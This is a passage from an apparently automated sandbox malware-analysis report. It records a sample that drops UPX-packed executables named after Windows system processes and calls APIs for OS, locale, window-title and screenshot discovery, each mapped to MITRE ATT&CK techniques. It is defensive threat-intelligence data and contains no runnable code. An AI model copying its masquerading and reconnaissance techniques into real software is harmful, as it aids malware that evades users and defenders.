\"ASCII text with CRLF line terminators\"- Location: [C:\\Puisi.txt]- [targetUID: 00000000-00000404]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00000404]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00000404]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"IEXPLORER.EXE.67A9C7F1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005712)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005968)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005484)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005984)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00006084)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00006084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bb901d01bb9010016b9010000b601e414b9018800000088000000176887779817b901ff2b877748ef9277a41bb901ac011b0000001b000000b601c06db60114009800a8000000c06db6015016b901100000000000000015009300a8000000c06db601 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eba57730a71f000070fd7f9a5c887700f0fd7f50c712004470fd7f00000000400000003f000000200000000070fd7f44c71200c15c887760828f77200000000070fd7f9a5c887700f0fd7f68c712005789877780838f7713177775d8eba577 (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bc801d01bc8010016c8010000c501e414c8018800000088000000176887779817c801ff2b87773ed99277a41bc801ac012500000025000000c501c06dc5011100a70065010000c06dc5015016c80110000000000000001200a20065010000c06dc501 (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eba577087729000050fd7f9a5c887700f0fd7f50c712004450fd7f00000000400000003f000000200000000050fd7f44c71200c15c887760828f77200000000050fd7f9a5c887700f0fd7f68c712005789877780838f7713177775d8eba577 (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bbb01d01bbb010016bb010000b801e414bb018800000088000000176887779817bb01ff2b8777d1d59277a41bbb01ac015f0000005f000000b801c06db80114009800d1040000c06db8015016bb01100000000000000015009300d1040000c06db801 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eba57788c8630000f0fd7f9a5c887700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c887760828f772000000000f0fd7f9a5c887700e0fd7f68c712005789877780838f7713177775d8eba577 (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bdb01d01bdb010016db010000d801e414db018800000088000000176887779817db01ff2b87772cc89277a41bdb01ac015f0000005f000000d801c06dd8011200a20011080000c06dd8015016db01100000000000000013009d0011080000c06dd801 (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bb701d01bb7010016b7010000b401e414b7018800000088000000176887779817b701ff2b877760cc9277a41bb701ac012000000020000000b401c06db4011400980066050000c06db4015016b70110000000000000001500930066050000c06db401 (UID: 00000000-00005968)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bd901d01bd9010016d9010000d601e414d9018800000088000000176887779817d901ff2b8777c5c79277a41bd901ac012400000024000000d601c06dd6011400980069010000c06dd6015016d90110000000000000001500930069010000c06dd601 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eba577309c28000090fd7f9a5c887700f0fd7f50c712004490fd7f00000000400000003f000000200000000090fd7f44c71200c15c887760828f77200000000090fd7f9a5c887700f0fd7f68c712005789877780838f7713177775d8eba577 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21b4201d01b42010016420100003f01e414420188000000880000001768877798174201ff2b8777b7b89277a41b4201ac0117000000170000003f01c06d3f0116008e001f000000c06d3f01501642011000000000000000170089001f000000c06d3f01 (UID: 00000000-00005484)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bbd01d01bbd010016bd010000ba01e414bd018800000088000000176887779817bd01ff2b8777d3bd9277a41bbd01ac011e0000001e000000ba01c06dba011400980066050000c06dba015016bd0110000000000000001500930066050000c06dba01 (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eba577589a22000040fd7f9a5c887700f0fd7f50c712004440fd7f00000000400000003f000000200000000040fd7f44c71200c15c887760828f77200000000040fd7f9a5c887700f0fd7f68c712005789877780838f7713177775d8eba577 (UID: 00000000-00005984)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a00100005a1b3f01581b3f0188153f0100003c016c143f0188000000880000001768877720173f01ff2b8777c3bd92772c1b3f01ac0162000000620000003c01905b3c011200a200ab040000905b3c01d8153f01100000000000000013009d00ab040000905b3c01 (UID: 00000000-00006084)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bd101d01bd1010016d1010000ce01e414d1018800000088000000176887779817d101ff2b87772bb29277a41bd101ac011d0000001d000000ce01c06dce0114009800d1040000c06dce015016d101100000000000000015009300d1040000c06dce01 (UID: 00000000-00006080)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bfd01d01bfd010016fd010000fa01e414fd018800000088000000176887779817fd01ff2b877773b49277a41bfd01ac011c0000001c000000fa01c06dfa0114009800d1040000c06dfa015016fd01100000000000000015009300d1040000c06dfa01 (UID: 00000000-00004168)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a00100005a1bd401581bd4018815d4010000d1016c14d4018800000088000000176887772017d401ff2b877755aa92772c1bd401ac011900000019000000d101905bd1011200a200aa040000905bd101d815d401100000000000000013009d00aa040000905bd101 (UID: 00000000-00004244)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bb201d01bb2010016b2010000af01e414b2018800000088000000176887779817b201ff2b8777caad9277a41bb201ac012500000025000000af01c06daf0116008e001f000000c06daf015016b2011000000000000000170089001f000000c06daf01 (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21b3700d01b37000016370000003400e414370088000000880000001768877798173700ff2b877779228f77a41b3700ac0124000000240000003400c06d34001400980016040000c06d34005016370010000000000000001500930016040000c06d3400 (UID: 00000000-00004220)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21be601d01be6010016e6010000e301e414e6018800000088000000176887779817e601ff2b87778bad9277a41be601ac011800000018000000e301c06de30116008e009c020000c06de3015016e6011000000000000000170089009c020000c06de301 (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eba577f0ca1d0000c0fd7f9a5c887700f0fd7f50c7120044c0fd7f00000000400000003f0000002000000000c0fd7f44c71200c15c887760828f772000000000c0fd7f9a5c887700f0fd7f68c712005789877780838f7713177775d8eba577 (UID: 00000000-00006064)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21b3801d01b38010016380100003501e414380188000000880000001768877798173801ff2b8777d9a69277a41b3801ac0115000000150000003501c06d350114009800d3040000c06d350150163801100000000000000015009300d3040000c06d3501 (UID: 00000000-00003992)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bc801d01bc8010016c8010000c501e414c8018800000088000000176887779817c801ff2b877767a69277a41bc801ac012700000027000000c501c06dc50116008e0032030000c06dc5015016c80110000000000000001700890032030000c06dc501 (UID: 00000000-00003996)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bd301d01bd3010016d3010000d001e414d3018800000088000000176887779817d301ff2b8777419e9277a41bd301ac012f0000002f000000d001c06dd0011400980019040000c06dd0015016d30110000000000000001500930019040000c06dd001 (UID: 00000000-00002256)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059877798010000a0010000d21bc901d01bc9010016c9010000c601e414c9018800000088000000176887779817c901ff2b8777759c9277a41bc901ac012c0000002c000000c601c06dc60116008e005a010000c06dc6015016c9011000000000000000170089005a010000c06dc601 (UID: 00000000-00002792)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005968)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005484)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005984)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006084)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006080)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004168)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004244)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004220)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005712)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetWindowTextA\" (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015b901eea3a0720016b90102000000a8b91e00609ba0720c16b9017d9ba072328a9a722c361e0097a8a0720200000000000000e0351e00a8b91e000816b90194f9120094f912003ff29872f015b901c3a5a0720016b901a8b91e00c0e59672e0351e0034000000d01bb9010000b601e02fb901c0e59672d8f91200dcf91200000000004e0200009cfa1200340000003400000017688777d81bb90100000000435c87778cee92770016b9012403b6010000b6015001b60193aba07200000000c06db6015c15b90100000000a8b91e004e02000000fa12005001b601b7aba072 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f0054db1200b344796a05000000000000000000000000000000000000000000000000000000180100000000000000000000000000006ce212005b03cd3c10e0120010e012005ecb1a761801000000000000005d18766ce212000e5d187604de1200dcaa1c76010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d534dd3ce4db12006d82997704ad1f0004010000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340039003300370039003500370032006600620063006500380036003500370066006600360062003400620064003100390065003300380034003400660036003000310062003100630033006600310065003700390066006500300033006200330038002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b877780d29277d8eba577ac011b0000001b0000000000000000000000ffff87010000000000000000000000000000000000000100f70087010000000000000000000038701b0000000000200000000000000000000000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff2c00180023000000620b1a760000000038701b000000000050000000fcc01f0002000000b88f1d00000000000100000878821f0060741b00380b1a7618da120002000000ccda12003f08147702000000b88f1d00000000000100001888fb1377bcda1200c81c1c7692dc120095fb1377f0db1200b88f1d0000000000000000000000000078db120000001b007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000934dd3c38db12006d829977bcac1f0004010000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600213bdd3c50d412006d829977d4ab200004010000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000a4d01200b344796a0900000000000000000000000000000000000000000000000000000070010000000000000000000000000000bcd71200eb09cd3c60d5120060d512005ecb1a767001000000000000005d1876bcd712000e5d187654d31200dcaa1c7601000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600053edd3c34d112006d829977cc89210004010000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000003b000000001b0000000000e08b210098d012000464877738011b00e063877702000000b88f1d0000000000010000085ccf120000000001bcc78f77c0c78f770a0000002010000000001b00b8892100f83b0000ff07000000001b00000000007f070000c4001b0008301b00c530000048d0120067e5847700001b00b88921000000000000001b00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600793fdd3c88d012006d829977cc89210004010000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0050e51e004be51e00000000000000000000001b0000000001d4cc12000000000038da120095e1837738060700feffffff435c877750598777aa000000b80000004ae51e0048e51e005cce120094d21200000000000000000000000000000000000000000000000000a01b000000001b001c5c867760d87675ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096ed877772e51e00a06a5d75860000005cce120094d212000000000086008800a06a5d755cce1200916c5d7572e51e00a06a5d75a06a5d75ccd2120002020000 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015c801eea3a0720016c8010200000000792800609ba0720c16c8017d9ba072328a9a72e47c280097a8a0720200000000000000987c2800007928000816c80194f9120094f912003ff29872f015c801c3a5a0720016c80100792800c0e59672987c280034000000d01bc8010000c501e02fc801c0e59672d8f91200dcf91200000000004e0200009cfa1200340000003400000017688777d81bc80100000000435c8777fad892770016c8012403c5010000c5015001c50193aba07200000000c06dc5015c15c80100000000007928004e02000000fa12005001c501b7aba072 (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005968)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005484)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005984)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006084)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006080)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004168)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004244)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004220)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006064)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003992)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003996)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002256)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002792)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003456)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003436)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000132)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004208)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003180)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"IsWow64Process\" with parameter \"5712\" - (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"6008\" - (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"6060\" - (UID: 00000000-00006060)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"6128\" - (UID: 00000000-00006128)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5984\" - (UID: 00000000-00005984)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"6064\" - (UID: 00000000-00006064)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"2792\" - (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4384\" - (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n 